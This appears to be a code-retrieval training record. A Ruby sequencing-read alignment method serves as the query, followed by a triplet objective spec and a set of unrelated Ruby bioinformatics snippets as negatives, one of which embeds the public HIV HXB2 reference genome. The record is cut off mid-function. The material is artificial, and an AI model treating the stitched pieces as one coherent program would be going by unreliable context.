" -U #{@names.get('trim')}" \
" -S #{@names.get('ncrna')}",
bwa:
'bwa mem' \
" -k #{opts[:seedlen]}" \
" #{ref} " \
" #{@names.get('trim')} " \
"| samtools view -b - > #{@names.get('ncrna')} " \
'&& bam2fastq' \
" -o #{@names.get('fp')}" \
" --no-aligned #{@names.get('ncrna')}",
tophat:
'tophat' \
" --read-edit-dist #{opts[:mismatches]}" \
" #{bt_flag}" \
" -N #{opts[:mismatches]}" \
" --output-dir #{@names.get('topout')}" \
' --no-novel-juncs' \
" #{gap_flag}" \
" --GTF #{opts[:annotation]}" \
" #{ref_base} #{@names.get('fp')}",
star:
'STAR' \
" --genomeDir #{ref_base}" \
" --outFilterMismatchNmax #{opts[:mismatches]}" \
" --readFilesIn #{@names.get('fp')}"\
" --outFileNamePrefix #{@names.get('mapped_all')}"
}
target =
opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')
run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')
[@names.get('mapped_all'), @names.get('unmapped')]
end
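
# A minimal usage sketch, kept as comments so the snippet above stays intact.
# All values below are hypothetical: the paths, the @names helper mapping
# logical labels ('trim', 'fp', 'ncrna', ...) to file paths, and run_cmd /
# skip_step? are assumed to exist in the surrounding pipeline class.
#
# mapped, unmapped = align(
# 'genome/hg38.fa', # ref: genomic reference FASTA (hypothetical path)
# 'genome/hg38', # ref_base: index prefix without file extension
# :bowtie2, # one of :bowtie1, :bowtie2, :bwa, :star, :tophat
# mismatches: 2, # read into gap_flag / -N only for :tophat
# seedlen: 20, # seed length (-L for bowtie2, -k for bwa)
# annotation: 'genome/hg38.gtf' # consumed only by the :tophat branch
# )
#
# Note that only the command for the chosen software key is executed; the
# other entries in aln_cmd are built but never run.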
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def unbucketized_alignment\n align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: @mismatches\n }\n )\n mapped_all = @software == :star ? \\\n @names.get('mapped_all_star') : @names.get('mapped_all')\n run_cmd(\"cp #{mapped_all} #{@names.get('mapped_merged')}\")\n unless @software == :star\n run_cmd(\n \"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}\"\n )\n end\n @max_mismatches = @mismatches\n end",
"def process_alignment\n # init vars\n @names = []\n @seqs = []\n \n @alignment = \"-B #{@basename}.aln\"\n\n # import alignment file\n @content = IO.readlines(@infile).map {|line| line.chomp}\n \n #check alignment for gap-only columns\n remove_inserts\n \n #write query-file\n File.open(@infile, \"w\") do |file|\n file.write(\">#{@names[0]}\\n\")\n file.write(\"#{@seqs[0]}\\n\")\n end\n \n #write aln-file\n File.open(@basename + \".aln\", \"w\") do |file|\n @names.each_index do |num|\n file.write(\"Sequence#{num} \")\n file.write(\" \") if (num < 10)\n file.write(\" \") if (num < 100)\n file.write(\"#{@seqs[num]}\\n\")\n end\n end\n end",
"def align_compressed_reads_to_human_genome_reference_using_bowtie\n\t\tputs \"step 7 align compressed reads to human genome reference using bowtie\"\n\t\tfiles.each_pair do |k,v|\n\t\t\t#\tbowtie's verbose is RIDICULOUS!\n\t\t\t#\tIt prints WAY too much and adds WAY too much time.\n\t\t\t#\t\t\t\t\"--verbose \"<<\n\t\t\tcommand = \"bowtie -n #{bowtie_mismatch} -p #{bowtie_threads} -f \" <<\n\t\t\t\t\"-S #{bowtie_index_human} compress_#{k}lane.fa compress_#{k}lane.sam\"\n\t\t\tcommand.execute\n\t\t\t\"compress_#{k}lane.sam\".file_check(die_on_failed_file_check) #\tthe reads that DIDN'T align?\tNO\n\n\t\t\t\"sam2names.rb compress_#{k}lane.sam bowtie_#{k}lane.names\".execute\n\t\t\t\"bowtie_#{k}lane.names\".file_check(die_on_failed_file_check)\n\t\tend\n\n\t\tpull_reads_from_fastas(\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.names\" },\n\t\t\tfiles.keys.sort.collect{|k| \"compress_#{k}lane.fa\" },\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.fa\" })\n\n#\n#\tThis script has fixed input of chopped_leftlane.psl (and right or single)\n#\tBAD. BAD. BAD.\tTODO\n#\tThis is only informative and nothing uses the output\n#\tso could be commented out.\n#\n#\n#\tTODO Replaced with ruby version, but still in development\n#\n#\n#\t\tcommand = \"candidate_non_human.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"bowtie_#{k}lane.names \" }\n#\t\tcommand.execute\n#\t\tfile_check( \"candidate_non_human.txt\" )\n\tend",
"def find_blat_out_candidate_reads\n\t\tputs \"step 4 find blat out candidate reads\"\n\t\tblat_out_candidate_reads(\n\t\t\tfiles.keys.sort.collect{|k| \"chopped_#{k}lane.psl \" },\n\t\t\tfiles.keys.sort.collect{|k| \"#{k}lane.fa \" },\n\t\t\tfiles.keys.sort.collect{|k| \"04_blat_out_candidate_#{k}lane.fa\" })\n\n#\t\tcommand = \"blatoutcandidate.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"chopped_#{k}lane.psl \" } #\tNON-HUMAN matches\n#\t\tfiles.keys.sort.each{|k| command << \"#{k}lane.fa \" } #\traw reads input\n#\t\tcommand.execute\n##\n##\tblatoutcandidate.pl ALWAYS creates ... blat_out_candidate_#{k}lane.fa\n##\tI REALLY don't like that. So much inconsistancy. Will overwrite existing.\n##\n##\tTODO wrote my own version of blatoutcandidate so could change this\n##\n#\t\tfiles.each_pair { |k,v| \n#\t\t\t#\t\n#\t\t\t#\traw reads with names in the psl files.\n#\t\t\t#\t\n#\t\t\t\"blat_out_candidate_#{k}lane.fa\".file_check(die_on_failed_file_check)\n#\t\t\tFileUtils.mv( \"blat_out_candidate_#{k}lane.fa\",\n#\t\t\t\t\"04_blat_out_candidate_#{k}lane.fa\" )\t#\tNON-HUMAN matches \n#\t\t}\n\tend",
"def generate_alignment\n raise ArgumentError, 'Missing genome FASTA file.' unless @genome_file\n raise ArgumentError, 'Missing transcripts FASTA file.' unless @transcripts_file\n \n # Prepare the BLAT alignment\n blat = Alignment::BLAT.new(@blat_options.merge({ out_format: :tab, database: @genome_file }))\n \n # Optionally set a permanent file to write the results to\n @alignment_file ||= \"#{@transcripts_file}.alignment\"\n blat.output_file = @alignment_file\n \n puts \"Running BLAT alignment...\" if @verbose\n \n # Run\n result_file = blat.run(@transcripts_file)\n result_file.path\n end",
"def create_cds_multi_fasta_file(options)\n require 'bioutils/rich_sequence_utils'\n require 'bioutils/glimmer'\n extend Glimmer\n\n default_options = {\n :cds_multi_fasta_file => \"cds_proteins.fas\",\n :verbose => false\n }\n options.reverse_merge!(default_options)\n\n options = MethodArgumentParser::Parser.check_options options do\n option :root_folder, :required => true, :type => :string\n option :cds_multi_fasta_file, :required => true, :type => :string\n option :sequence_files, :required => true, :type => :array\n\n end\n\n Dir.chdir(options[:root_folder])\n\n files_with_cds = Array.new # a list of files containing\n options[:sequence_files].each do |sequence_file|\n sequence_format = guess_sequence_format(sequence_file)\n if sequence_format == :fasta\n if options[:training_model_prefix]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => options[:training_model_prefix],:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n elsif options[:training_sequence_path]\n model_file_prefix = File.basename(options[:training_sequence_path], File.extname(options[:training_sequence_path])) + \"_glimmer\"\n if File.exists?(model_file_prefix + \".icm\")\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n else\n print \".\"\n end\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => model_file_prefix,:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training sequence ....\"\n else\n print \".\"\n end\n predict_file = predict_genes_using_glimmer(:input_sequence_path => sequence_file,\n :rich_sequence_training_path => options[:training_sequence_path],\n :glimmer_dir_path => options[:glimmer_dir],\n :suppress_messages => true)\n end\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using iterated glimmer....\"\n else\n print \".\"\n end\n predict_using_iterated_glimmer(:suppress_messages => true, :input_sequence_path => sequence_file, :glimmer_predict_filename => File.basename(sequence_file, File.extname(sequence_file)),:glimmer_dir_path => options[:glimmer_dir])\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \".predict\"\n end\n if options[:verbose]\n puts \"Converting #{sequence_file} glimmer prediction to a genbank file ....\"\n else\n print \".\"\n end\n glimmer_genbank_file = glimmer_prediction_to_rich_sequence_file(:suppress_messages => true, :glimmer_predict_file => predict_file, :input_sequence_path => sequence_file)\n files_with_cds << glimmer_genbank_file\n else\n files_with_cds << sequence_file\n end\n end\n\n cds_multi_fasta_protein_file = File.open(options[:cds_multi_fasta_file], \"w\")\n read_cds_and_write_to_file(files_with_cds, cds_multi_fasta_protein_file)\n processing_indicator(5)\n\n cds_multi_fasta_protein_file.close\n end",
"def sequence_locator(seq=\"\",temp_dir=File.dirname($0))\n hxb2_ref = \"TGGAAGGGCTAATTCACTCCCAACGAAGACAAGATATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTAGCAGAACTACACACCAGGGCCAGGGATCAGATATCCACTGACCTTTGGATGGTGCTACAAGCTAGTACCAGTTGAGCCAGAGAAGTTAGAAGAAGCCAACAAAGGAGAGAACACCAGCTTGTTACACCCTGTGAGCCTGCATGGAATGGATGACCCGGAGAGAGAAGTGTTAGAGTGGAGGTTTGACAGCCGCCTAGCATTTCATCACATGGCCCGAGAGCTGCATCCGGAGTACTTCAAGAACTGCTGACATCGAGCTTGCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGCGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATCCTGCATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTTCAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCAGTGGCGCCCGAACAGGGACCTGAAAGCGAAAGGGAAACCAGAGGAGCTCTCTCGACGCAGGACTCGGCTTGCTGAAGCGCGCACGGCAAGAGGCGAGGGGCGGCGACTGGTGAGTACGCCAAAAATTTTGACTAGCGGAGGCTAGAAGGAGAGAGATGGGTGCGAGAGCGTCAGTATTAAGCGGGGGAGAATTAGATCGATGGGAAAAAATTCGGTTAAGGCCAGGGGGAAAGAAAAAATATAAATTAAAACATATAGTATGGGCAAGCAGGGAGCTAGAACGATTCGCAGTTAATCCTGGCCTGTTAGAAACATCAGAAGGCTGTAGACAAATACTGGGACAGCTACAACCATCCCTTCAGACAGGATCAGAAGAACTTAGATCATTATATAATACAGTAGCAACCCTCTATTGTGTGCATCAAAGGATAGAGATAAAAGACACCAAGGAAGCTTTAGACAAGATAGAGGAAGAGCAAAACAAAAGTAAGAAAAAAGCACAGCAAGCAGCAGCTGACACAGGACACAGCAATCAGGTCAGCCAAAATTACCCTATAGTGCAGAACATCCAGGGGCAAATGGTACATCAGGCCATATCACCTAGAACTTTAAATGCATGGGTAAAAGTAGTAGAAGAGAAGGCTTTCAGCCCAGAAGTGATACCCATGTTTTCAGCATTATCAGAAGGAGCCACCCCACAAGATTTAAACACCATGCTAAACACAGTGGGGGGACATCAAGCAGCCATGCAAATGTTAAAAGAGACCATCAATGAGGAAGCTGCAGAATGGGATAGAGTGCATCCAGTGCATGCAGGGCCTATTGCACCAGGCCAGATGAGAGAACCAAGGGGAAGTGACATAGCAGGAACTACTAGTACCCTTCAGGAACAAATAGGATGGATGACAAATAATCCACCTATCCCAGTAGGAGAAATTTATAAAAGATGGATAATCCTGGGATTAAATAAAATAGTAAGAATGTATAGCCCTACCAGCATTCTGGACATAAGACAAGGACCAAAGGAACCCTTTAGAGACTATGTAGACCGGTTCTATAAAACTCTAAGAGCCGAGCAAGCTTCACAGGAGGTAAAAAATTGGATGACAGAAACCTTGTTGGTCCAAAATGCGAACCCAGATTGTAAGACTATTTTAAAAGCATTGGGACCAGCGGCTACACTAGAAGAAATGATGACAGCATGTCAGGGAGTAGGAGGACCCGGCCATAAGGCAAGAGTTTTGGCTGAAGCAATGAGCCAAGTAACAAATTCAGCTACCATAATGATGCAGAGAGGCAATTTTAGGAACCAAAGAAAGATTGTTAAGTGTTTCAATTGTGGCAAAGAAGGGCACACAGCCAGAAATTGCAGGGCCCCTAGGAAAAAGGGCTGTTGGAAATGTGGAAAGGAAGGACACCAAATGAAAGATTGTACTGAGAGACAGGCTAATTTTTTAGGGAAGATCTGGCCTTCCTACAAGGGAAGGCCAGGGAATTTTCTTCAGAGCAGACCAGAGCCAACAGCCCCACCAGAAGAGAGCTTCAGGTCTGGGGTAGAGACAACAACTCCCCCTCAGAAGCAGGAGCCGATAGACAAGGAACTGTATCCTTTAACTTCCCTCAGGTCACTCTTTGGCAACGACCCCTCGTCACAATAAAGATAGGGGGGCAACTAAAGGAAGCTCTATTAGATACAGGAGCAGATGATACAGTATTAGAAGAAATGAGTTTGCCAGGAAGATGGAAACCAAAAATGATAGGGGGAATTGGAGGTTTTATCAAAGTAAGACAGTATGATCAGATACTCATAGAAATCTGTGGACATAAAGCTATAGGTACAGTATTAGTAGGACCTACACCTGTCAACATAATTGGAAGAAATCTGTTGACTCAGATTGGTTGCACTTTAAATTTTCCCATTAGCCCTATTGAGACTGTACCAGTAAAATTAAAGCCAGGAATGGATGGCCCAAAAGTTAAACAATGGCCATTGACAGAAGAAAAAATAAAAGCATTAGTAGAAATTTGTACAGAGATGGAAAAGGAAGGGAAAATTTCAAAAATTGGGCCTGAAAATCCATACAATACTCCAGTATTTGCCATAAAGAAAAAAGACAGTACTAAATGGAGAAAATTAGTAGATTTCAGAGAACTTAATAAGAGAACTCAAGACTTCTGGGAAGTTCAATTAGGAATACCACATCCCGCAGGGTTAAAAAAGAAAAAATCAGTAACAGTACTGGATGTGGGTGATGCATATTTTTCAGTTCCCTTAGATGAAGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCACAGGGATGGAAAGGATCACCAGCAATATTCCAAAGTAGCATGACAAAAATCTTAGAGCCTTTTAGAAAACAAAATCCAGACATAGTTATCTATCAATACATGGATGATTTGTATGTAGGATCTGACTTAGAAATAGGGCAGCATAGAACAAAAATAGAGGAGCTGAGACAACATCTGTTGAGGTGGGGACTTACCACACCAGACAAAAAACATCAGAAAGAACCTCCATTCCTTTGGATGGGTTATGAACTCCATCCTGATAAATGGACAGTACAGCCTATAGTGCTGCCAGAAAAAGACAGCTGGACTGTCAATGACATACAGAAGTTAGTGGGGAAATTGAATTGGGCAAGTCAGATTTACCCAGGGATTAAAGTAAGGCAATTATGTAAACTCCTTAGAGGAACCAAAGCACTAACAGAAGTAATACCACTAACAGAAGAAGCAGAGCTAGAACTGGCAGAAAACAGAGAGATTCTAAAA
GAACCAGTACATGGAGTGTATTATGACCCATCAAAAGACTTAATAGCAGAAATACAGAAGCAGGGGCAAGGCCAATGGACATATCAAATTTATCAAGAGCCATTTAAAAATCTGAAAACAGGAAAATATGCAAGAATGAGGGGTGCCCACACTAATGATGTAAAACAATTAACAGAGGCAGTGCAAAAAATAACCACAGAAAGCATAGTAATATGGGGAAAGACTCCTAAATTTAAACTGCCCATACAAAAGGAAACATGGGAAACATGGTGGACAGAGTATTGGCAAGCCACCTGGATTCCTGAGTGGGAGTTTGTTAATACCCCTCCCTTAGTGAAATTATGGTACCAGTTAGAGAAAGAACCCATAGTAGGAGCAGAAACCTTCTATGTAGATGGGGCAGCTAACAGGGAGACTAAATTAGGAAAAGCAGGATATGTTACTAATAGAGGAAGACAAAAAGTTGTCACCCTAACTGACACAACAAATCAGAAGACTGAGTTACAAGCAATTTATCTAGCTTTGCAGGATTCGGGATTAGAAGTAAACATAGTAACAGACTCACAATATGCATTAGGAATCATTCAAGCACAACCAGATCAAAGTGAATCAGAGTTAGTCAATCAAATAATAGAGCAGTTAATAAAAAAGGAAAAGGTCTATCTGGCATGGGTACCAGCACACAAAGGAATTGGAGGAAATGAACAAGTAGATAAATTAGTCAGTGCTGGAATCAGGAAAGTACTATTTTTAGATGGAATAGATAAGGCCCAAGATGAACATGAGAAATATCACAGTAATTGGAGAGCAATGGCTAGTGATTTTAACCTGCCACCTGTAGTAGCAAAAGAAATAGTAGCCAGCTGTGATAAATGTCAGCTAAAAGGAGAAGCCATGCATGGACAAGTAGACTGTAGTCCAGGAATATGGCAACTAGATTGTACACATTTAGAAGGAAAAGTTATCCTGGTAGCAGTTCATGTAGCCAGTGGATATATAGAAGCAGAAGTTATTCCAGCAGAAACAGGGCAGGAAACAGCATATTTTCTTTTAAAATTAGCAGGAAGATGGCCAGTAAAAACAATACATACTGACAATGGCAGCAATTTCACCGGTGCTACGGTTAGGGCCGCCTGTTGGTGGGCGGGAATCAAGCAGGAATTTGGAATTCCCTACAATCCCCAAAGTCAAGGAGTAGTAGAATCTATGAATAAAGAATTAAAGAAAATTATAGGACAGGTAAGAGATCAGGCTGAACATCTTAAGACAGCAGTACAAATGGCAGTATTCATCCACAATTTTAAAAGAAAAGGGGGGATTGGGGGGTACAGTGCAGGGGAAAGAATAGTAGACATAATAGCAACAGACATACAAACTAAAGAATTACAAAAACAAATTACAAAAATTCAAAATTTTCGGGTTTATTACAGGGACAGCAGAAATCCACTTTGGAAAGGACCAGCAAAGCTCCTCTGGAAAGGTGAAGGGGCAGTAGTAATACAAGATAATAGTGACATAAAAGTAGTGCCAAGAAGAAAAGCAAAGATCATTAGGGATTATGGAAAACAGATGGCAGGTGATGATTGTGTGGCAAGTAGACAGGATGAGGATTAGAACATGGAAAAGTTTAGTAAAACACCATATGTATGTTTCAGGGAAAGCTAGGGGATGGTTTTATAGACATCACTATGAAAGCCCTCATCCAAGAATAAGTTCAGAAGTACACATCCCACTAGGGGATGCTAGATTGGTAATAACAACATATTGGGGTCTGCATACAGGAGAAAGAGACTGGCATTTGGGTCAGGGAGTCTCCATAGAATGGAGGAAAAAGAGATATAGCACACAAGTAGACCCTGAACTAGCAGACCAACTAATTCATCTGTATTACTTTGACTGTTTTTCAGACTCTGCTATAAGAAAGGCCTTATTAGGACACATAGTTAGCCCTAGGTGTGAATATCAAGCAGGACATAACAAGGTAGGATCTCTACAATACTTGGCACTAGCAGCATTAATAACACCAAAAAAGATAAAGCCACCTTTGCCTAGTGTTACGAAACTGACAGAGGATAGATGGAACAAGCCCCAGAAGACCAAGGGCCACAGAGGGAGCCACACAATGAATGGACACTAGAGCTTTTAGAGGAGCTTAAGAATGAAGCTGTTAGACATTTTCCTAGGATTTGGCTCCATGGCTTAGGGCAACATATCTATGAAACTTATGGGGATACTTGGGCAGGAGTGGAAGCCATAATAAGAATTCTGCAACAACTGCTGTTTATCCATTTTCAGAATTGGGTGTCGACATAGCAGAATAGGCGTTACTCGACAGAGGAGAGCAAGAAATGGAGCCAGTAGATCCTAGACTAGAGCCCTGGAAGCATCCAGGAAGTCAGCCTAAAACTGCTTGTACCAATTGCTATTGTAAAAAGTGTTGCTTTCATTGCCAAGTTTGTTTCATAACAAAAGCCTTAGGCATCTCCTATGGCAGGAAGAAGCGGAGACAGCGACGAAGAGCTCATCAGAACAGTCAGACTCATCAAGCTTCTCTATCAAAGCAGTAAGTAGTACATGTAACGCAACCTATACCAATAGTAGCAATAGTAGCATTAGTAGTAGCAATAATAATAGCAATAGTTGTGTGGTCCATAGTAATCATAGAATATAGGAAAATATTAAGACAAAGAAAAATAGACAGGTTAATTGATAGACTAATAGAAAGAGCAGAAGACAGTGGCAATGAGAGTGAAGGAGAAATATCAGCACTTGTGGAGATGGGGGTGGAGATGGGGCACCATGCTCCTTGGGATGTTGATGATCTGTAGTGCTACAGAAAAATTGTGGGTCACAGTCTATTATGGGGTACCTGTGTGGAAGGAAGCAACCACCACTCTATTTTGTGCATCAGATGCTAAAGCATATGATACAGAGGTACATAATGTTTGGGCCACACATGCCTGTGTACCCACAGACCCCAACCCACAAGAAGTAGTATTGGTAAATGTGACAGAAAATTTTAACATGTGGAAAAATGACATGGTAGAACAGATGCATGAGGATATAATCAGTTTATGGGATCAAAGCCTAAAGCCATGTGTAAAATTAACCCCACTCTGTGTTAGTTTAAAGTGCACTGATTTGAAGAATGATACTAATACCAATAGTAGTAGCGGGAGAATGATAATGGAGAAAGGAGAGATAAAAAACTGCTCTTTCAATATCAGCACAAGCATAAGAGGTAAGGTGCAGAAAGAATATGCATTTTTTTATAAACTTGATATAATACCAATAGATAATGATACTACCAGCTATAAGTTGACAAGTTGTAACACCTCAGTCATTACACAGGCCTGTCCAAAGGTATCCTTTGAGCCAATTCCCATACATTATTGTGCCCCGGCTGGTTTTGCGATTCTAAAATGTAATAATAAGACGTTCAATGGAACAGGACCATGTACAAATGTCAGCACAGTACAATGTACACATGGAATTAGGCCAGTAGTATCAACTCAACTGCTGTTAAATGGCAGTCTAGCAGAAGAAGAGGTAGTA
ATTAGATCTGTCAATTTCACGGACAATGCTAAAACCATAATAGTACAGCTGAACACATCTGTAGAAATTAATTGTACAAGACCCAACAACAATACAAGAAAAAGAATCCGTATCCAGAGAGGACCAGGGAGAGCATTTGTTACAATAGGAAAAATAGGAAATATGAGACAAGCACATTGTAACATTAGTAGAGCAAAATGGAATAACACTTTAAAACAGATAGCTAGCAAATTAAGAGAACAATTTGGAAATAATAAAACAATAATCTTTAAGCAATCCTCAGGAGGGGACCCAGAAATTGTAACGCACAGTTTTAATTGTGGAGGGGAATTTTTCTACTGTAATTCAACACAACTGTTTAATAGTACTTGGTTTAATAGTACTTGGAGTACTGAAGGGTCAAATAACACTGAAGGAAGTGACACAATCACCCTCCCATGCAGAATAAAACAAATTATAAACATGTGGCAGAAAGTAGGAAAAGCAATGTATGCCCCTCCCATCAGTGGACAAATTAGATGTTCATCAAATATTACAGGGCTGCTATTAACAAGAGATGGTGGTAATAGCAACAATGAGTCCGAGATCTTCAGACCTGGAGGAGGAGATATGAGGGACAATTGGAGAAGTGAATTATATAAATATAAAGTAGTAAAAATTGAACCATTAGGAGTAGCACCCACCAAGGCAAAGAGAAGAGTGGTGCAGAGAGAAAAAAGAGCAGTGGGAATAGGAGCTTTGTTCCTTGGGTTCTTGGGAGCAGCAGGAAGCACTATGGGCGCAGCCTCAATGACGCTGACGGTACAGGCCAGACAATTATTGTCTGGTATAGTGCAGCAGCAGAACAATTTGCTGAGGGCTATTGAGGCGCAACAGCATCTGTTGCAACTCACAGTCTGGGGCATCAAGCAGCTCCAGGCAAGAATCCTGGCTGTGGAAAGATACCTAAAGGATCAACAGCTCCTGGGGATTTGGGGTTGCTCTGGAAAACTCATTTGCACCACTGCTGTGCCTTGGAATGCTAGTTGGAGTAATAAATCTCTGGAACAGATTTGGAATCACACGACCTGGATGGAGTGGGACAGAGAAATTAACAATTACACAAGCTTAATACACTCCTTAATTGAAGAATCGCAAAACCAGCAAGAAAAGAATGAACAAGAATTATTGGAATTAGATAAATGGGCAAGTTTGTGGAATTGGTTTAACATAACAAATTGGCTGTGGTATATAAAATTATTCATAATGATAGTAGGAGGCTTGGTAGGTTTAAGAATAGTTTTTGCTGTACTTTCTATAGTGAATAGAGTTAGGCAGGGATATTCACCATTATCGTTTCAGACCCACCTCCCAACCCCGAGGGGACCCGACAGGCCCGAAGGAATAGAAGAAGAAGGTGGAGAGAGAGACAGAGACAGATCCATTCGATTAGTGAACGGATCCTTGGCACTTATCTGGGACGATCTGCGGAGCCTGTGCCTCTTCAGCTACCACCGCTTGAGAGACTTACTCTTGATTGTAACGAGGATTGTGGAACTTCTGGGACGCAGGGGGTGGGAAGCCCTCAAATATTGGTGGAATCTCCTACAGTATTGGAGTCAGGAACTAAAGAATAGTGCTGTTAGCTTGCTCAATGCCACAGCCATAGCAGTAGCTGAGGGGACAGATAGGGTTATAGAAGTAGTACAAGGAGCTTGTAGAGCTATTCGCCACATACCTAGAAGAATAAGACAGGGCTTGGAAAGGATTTTGCTATAAGATGGGTGGCAAGTGGTCAAAAAGTAGTGTGATTGGATGGCCTACTGTAAGGGAAAGAATGAGACGAGCTGAGCCAGCAGCAGATAGGGTGGGAGCAGCATCTCGAGACCTGGAAAAACATGGAGCAATCACAAGTAGCAATACAGCAGCTACCAATGCTGCTTGTGCCTGGCTAGAAGCACAAGAGGAGGAGGAGGTGGGTTTTCCAGTCACACCTCAGGTACCTTTAAGACCAATGACTTACAAGGCAGCTGTAGATCTTAGCCACTTTTTAAAAGAAAAGGGGGGACTGGAAGGGCTAATTCACTCCCAAAGAAGACAAGATATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTAGCAGAACTACACACCAGGGCCAGGGGTCAGATATCCACTGACCTTTGGATGGTGCTACAAGCTAGTACCAGTTGAGCCAGATAAGATAGAAGAGGCCAATAAAGGAGAGAACACCAGCTTGTTACACCCTGTGAGCCTGCATGGGATGGATGACCCGGAGAGAGAAGTGTTAGAGTGGAGGTTTGACAGCCGCCTAGCATTTCATCACGTGGCCCGAGAGCTGCATCCGGAGTACTTCAAGAACTGCTGACATCGAGCTTGCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGCGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATCCTGCATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTTCAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCA\"\n hxb2_l = hxb2_ref.size\n head = \"\"\n 8.times {head << (65 + rand(25)).chr}\n temp_file = temp_dir + \"/\" + head + \"_temp\"\n temp_aln = temp_dir + \"/\" + head + \"_temp_aln\"\n\n l1 = 0\n l2 = 0\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts hxb2_ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n\n begin\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n if ref_size > 1.3*(seq.size)\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n max_seq = aln_test2.scan(/[ACGT]+/).max_by(&:length)\n aln_test2 =~ /#{max_seq}/\n before_aln_seq = $`\n before_aln 
= $`.size\n post_aln_seq = $'\n post_aln = $'.size\n before_aln_seq_size = before_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b1 = (1.3 * before_aln_seq_size).to_i\n post_aln_seq_size = post_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b2 = (1.3 * post_aln_seq_size).to_i\n if (before_aln > seq.size) and (post_aln <= seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1)]\n l1 = l1 + (before_aln - b1)\n elsif (post_aln > seq.size) and (before_aln <= seq.size)\n ref = ref[before_aln..(ref_size - post_aln - 1 + b2)]\n l2 = l2 + post_aln - b2\n elsif (post_aln > seq.size) and (before_aln > seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1 + b2)]\n l1 = l1 + (before_aln - b1)\n l2 = l2 + (post_aln - b2)\n end\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n end\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n\n if g1 == g2 and (s1 + g1 + s2) == ref.size\n if s1 > s2 and g2 > 2*s2\n ref = ref[0..(-g2-1)]\n repeat = 1\n l2 = l2 + g2\n elsif s1 < s2 and g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n else\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 > 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n 